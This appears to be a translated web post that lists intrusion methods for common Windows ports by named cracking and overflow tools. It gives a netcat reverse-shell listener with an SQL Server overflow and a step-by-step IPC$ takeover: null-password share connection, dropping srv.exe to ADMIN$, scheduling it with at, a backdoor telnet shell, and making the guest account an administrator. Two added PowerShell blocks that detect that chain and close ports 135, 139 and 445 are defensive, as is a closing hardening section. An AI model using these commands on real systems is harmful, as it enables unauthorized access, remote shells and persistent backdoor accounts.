Detailed description of port intrusion

Source: Internet
Author: User
Tags: net time

1. Port 135 intrusion

You can use an NT scanner to scan the desired IP address.

Use recton2.5 to enable the 3389 or Telnet service.

2. Port 139 intrusion

Scan the port for weak passwords.

Scan for weak passwords in batches with X-Scan.

3. Port 1433 intrusion

Use scanport.exe to find machines with port 1433 open.

Sqlscanpas*.**e dictionary cracking (the dictionary is the key).

Finally, use sqltool*.**e for the intrusion.

The SQL Server "Hello" overflow vulnerability affects SQL Server SP2 and earlier.

Start `nc -vv -l -p <local port>` locally, then run `sqlhellof.exe <target IP> 1433 <local IP> <local port>`.

(Tested successfully.)

`sqlhelloz.exe <target IP> 1433` (this one is a forward connection).

4. Port 4899 intrusion

Use 4899filter.exe to scan for machines with empty passwords.

5. Port 3389 intrusion

For very old machines, try the overflow (win3389ex.exe).

For Windows 2000 machines, try dictionary cracking (tscrack.exe).

6. Port 80 intrusion

For machines earlier than SP3, WebDAV can be used for intrusion.

For BBS forums, try the upload vulnerability (upfile.exe or dvup_delphi.exe).

SQL injection can also be used (the "Ah D" injection tool).

7. Serv-U intrusion (port 21)

Versions 5.004 and below can be overflowed (serv5004.exe).

Versions 5.1.0.0 and earlier allow local privilege escalation (servlocal.exe).

Serv-U's MD5-hashed passwords can be dictionary-cracked (crack.vbs).

Enter the Serv-U encrypted password (34 characters) and compare it against the dictionary (dict.txt) to recover the password.

8. Port 554 intrusion

Use real554.exe for intrusion.


9. Port 6129 intrusion

Use dameware6129.exe for intrusion.

10. System Vulnerabilities

The MS03-026, MS03-039, MS03-049 and MS04-011 vulnerabilities are exploited on ports 135 and 445 for overflow intrusion.

11. Port 3127 and other ports

The port opened by the MyDoom virus can be exploited with nodoom.exe (mydoomscan.exe can be used to scan for it).

12. Other intrusions

Use Shanlu's automated tool (winntautoattack.exe).

Classic IPC$ intrusion

1. C:\> net use \\127.0.0.1\IPC$ "" /user:"administrators"

This uses the user name found by the "Streamer" scanner, which is "administrators", with an empty password; the command establishes a connection to 127.0.0.1. Because the password is empty, nothing is entered between the first pair of quotation marks; the user name between the second pair of quotation marks is administrators.

2. C:\> copy srv.exe \\127.0.0.1\ADMIN$

First copy srv.exe, which is in the Streamer tools directory. ADMIN$ here refers to the host's C:\winnt\system32\; you can also use C$ or D$, which refer to drive C and drive D, depending on where you want to copy the file.

3. C:\> net time \\127.0.0.1

Check the time: the current time of \\127.0.0.1 is ... The command completed successfully.

4. C:\> at \\127.0.0.1 11:05 srv.exe

Use the at command to start srv.exe (the time set here must be later than the host's current time, or how would it start?).

5. C:\> net time \\127.0.0.1

Check the time again; once the current time of \\127.0.0.1 has reached ..., run the following command.

6. C:\> telnet 127.0.0.1 99

The telnet command is used here. Note that the port is 99: telnet uses port 23 by default, but srv creates a shell on port 99 on the other computer for us.

Although we can telnet in, srv is one-time: it has to be activated again for the next login. So create a Telnet service instead. This requires NTLM.

7. C:\> copy ntlm.exe \\127.0.0.1\ADMIN$

Use the copy command to upload ntlm.exe to the target (ntlm.exe is also in the Streamer tools directory).

8. C:\winnt\system32> ntlm

Enter ntlm to start it (here C:\winnt\system32> is on the peer computer, so running ntlm actually runs the program on the other computer). When "done" appears, it has started normally. Use "net start telnet" to enable the Telnet service!

9. Telnet to 127.0.0.1 and enter the user name and password to get into the other party's machine. Operation is just like on DOS, just as easy! (Then what do you want to do? Do what you want, haha!)

To prevent this, we activate guest and add it to the administrators group.

10. C:\> net user guest /active:yes

Activate the other party's guest user.

11. C:\> net user guest 1234

Change the guest password to 1234 (or set whatever password you like).

12. C:\> net localgroup administrators guest /add

Make guest an administrator.
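Defender-side example, added here and not part of the original post: a PowerShell function that scans process-creation command lines for the three-stage IPC$ chain described above (net use to IPC$, copy to an admin share, at job against the same host) and reports source, user and target. The `host=... user=... cmd="..."` log line format and the sample lines are constructed for this example; adapt the first regex to your own audit source.

```powershell
# Added example (not from the original post). Looks for the IPC$ chain described
# above in process-creation command lines. The log line format below is constructed
# for this example; adapt the parsing regex to your own audit source.
$sampleLog = @(
    '2024-01-01 10:00:01 host=WS01 user=bob cmd="net use \\10.0.0.5\IPC$ "" /user:"administrators""',
    '2024-01-01 10:00:09 host=WS01 user=bob cmd="copy srv.exe \\10.0.0.5\ADMIN$"',
    '2024-01-01 10:00:15 host=WS01 user=bob cmd="net time \\10.0.0.5"',
    '2024-01-01 10:00:20 host=WS01 user=bob cmd="at \\10.0.0.5 11:05 srv.exe"',
    '2024-01-01 10:03:00 host=WS02 user=alice cmd="net use \\fileserver\share Z:"'
)

function Find-IpcChain {
    param([string[]]$Lines)
    $seen   = @{}   # key "source->target" => hashtable of stages observed so far
    $alerts = @()
    foreach ($line in $Lines) {
        if ($line -notmatch 'host=(?<src>\S+)\s+user=(?<user>\S+)\s+cmd="(?<cmd>.*)"$') { continue }
        $src = $Matches.src; $user = $Matches.user; $cmd = $Matches.cmd
        $stage = $null
        # Stage 1: session to the IPC$ share (-match is case-insensitive by default)
        if ($cmd -match '^net use \\\\(?<t>[^\\\s]+)\\IPC\$') { $stage = 'ipc'; $target = $Matches.t }
        # Stage 2: file dropped on ADMIN$ or a drive share such as C$
        elseif ($cmd -match '^copy .+\\\\(?<t>[^\\\s]+)\\(ADMIN|[A-Z])\$') { $stage = 'copy'; $target = $Matches.t }
        # Stage 3: remote scheduled job via the at command
        elseif ($cmd -match '^at \\\\(?<t>[^\\\s]+)') { $stage = 'at'; $target = $Matches.t }
        if (-not $stage) { continue }
        $key = "${src}->${target}"
        if (-not $seen.ContainsKey($key)) { $seen[$key] = @{} }
        $seen[$key][$stage] = $true
        if ($seen[$key].Count -eq 3) {
            $alerts += "IPC`$ chain from $src (user $user) against ${target}: IPC`$ session, admin-share copy, at job"
            $seen[$key]['alerted'] = $true   # bumps the count so the same chain is not reported twice
        }
    }
    return $alerts
}

Find-IpcChain -Lines $sampleLog
```

The benign `net use \\fileserver\share` line from WS02 never matches a stage, so only the WS01 to 10.0.0.5 chain is reported.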

This time we are talking about shutting down high-risk ports! Mainly the few hot ports of the past period, which are dangerous for our personal computers: 135, 139 and 445.

First, port 139! Disable NetBIOS! If you are on broadband, disable it on the modem; if you are on a LAN, disable it directly on the NIC, that is, the local connection. You will be prompted to restart later; restart and then it's OK!

Next is 445. There are many methods; here is the most practical one! This port is also the most dangerous! Microsoft wants to make money and leaves such a hidden danger in the operating system! Open the registry first and find this key in turn:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters

Here, create a new DWORD value named SMBDeviceEnabled with the value 0!

The last one is 135. This is a little troublesome, but we can still close it! Open the firewall first and enable it, because this firewall is disabled by default! With the firewall on, 135 is closed too. However, many network programs then cannot get through! Haha! It doesn't matter! You only need to add them to the exception list. If WMI is in your computer's firewall exceptions, that's the one! Be sure to delete it or remove the check mark, then enable the firewall once there is no problem! WMI is what uses port 135.

If there is File and Printer Sharing, I suggest you cancel it, because that is 445; then is it safe? After all, none of this can guarantee security! If you can't do it, just think of it!
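Added example, not from the original post: a PowerShell script that audits the three ports singled out above (135, 139, 445) on the local Windows host against the steps in the text and, with -Fix, applies the 139 and 445 changes (NetBIOS over TCP/IP off per adapter rather than disabling the whole NIC, and SMBDeviceEnabled = 0 under NetBT\Parameters). It assumes an elevated prompt on Windows 8 / Server 2012 or later (NetTCPIP and NetSecurity modules) and assumes the standard WMI firewall rule group name.

```powershell
# Added example (not from the original post). Audits ports 135, 139 and 445 on the
# local Windows host against the steps in the text and, with -Fix, applies the 139
# and 445 changes (per-adapter NetBIOS off; SMBDeviceEnabled = 0). Run elevated.
param([switch]$Fix)

$netbt = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters'

function Get-PortAudit {
    # Which of the three ports currently have a listener, and on which addresses
    foreach ($p in 135, 139, 445) {
        $l = Get-NetTCPConnection -State Listen -LocalPort $p -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Port      = $p
            Listening = [bool]$l
            Addresses = (@($l.LocalAddress) | Sort-Object -Unique) -join ','
        }
    }
}

function Get-SmbDeviceEnabled {
    # Value absent means the default (1, SMB over 445 on); the text sets it to 0
    $v = Get-ItemProperty -Path $netbt -Name SMBDeviceEnabled -ErrorAction SilentlyContinue
    if ($null -eq $v) { return 1 }
    return [int]$v.SMBDeviceEnabled
}

function Get-FirewallAudit {
    # The text's 135 step: firewall on, and no WMI exception letting 135 through
    $off = (Get-NetFirewallProfile | Where-Object { $_.Enabled -eq 'False' }).Name
    $wmi = Get-NetFirewallRule -DisplayGroup 'Windows Management Instrumentation (WMI)' `
               -Direction Inbound -Enabled True -ErrorAction SilentlyContinue
    [pscustomobject]@{ DisabledProfiles = ($off -join ','); WmiInboundAllowed = [bool]$wmi }
}

$adapters = Get-CimInstance Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE'
Get-PortAudit | Format-Table -AutoSize
"SMBDeviceEnabled = $(Get-SmbDeviceEnabled)   (0 = direct-hosted SMB on 445 off after reboot)"
Get-FirewallAudit | Format-Table -AutoSize
# TcpipNetbiosOptions: 0 = via DHCP, 1 = enabled, 2 = disabled (the 139 side)
$adapters | Select-Object Description, TcpipNetbiosOptions | Format-Table -AutoSize

if ($Fix) {
    New-ItemProperty -Path $netbt -Name SMBDeviceEnabled -PropertyType DWord -Value 0 -Force | Out-Null
    foreach ($a in $adapters) {
        Invoke-CimMethod -InputObject $a -MethodName SetTcpipNetbios `
            -Arguments @{ TcpipNetbiosOptions = [uint32]2 } | Out-Null
    }
    'Applied. Reboot for the NetBT change to take effect.'
}
```

Run it once without -Fix to see the current state, and again after the reboot to confirm 139 and 445 no longer listen on external addresses.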
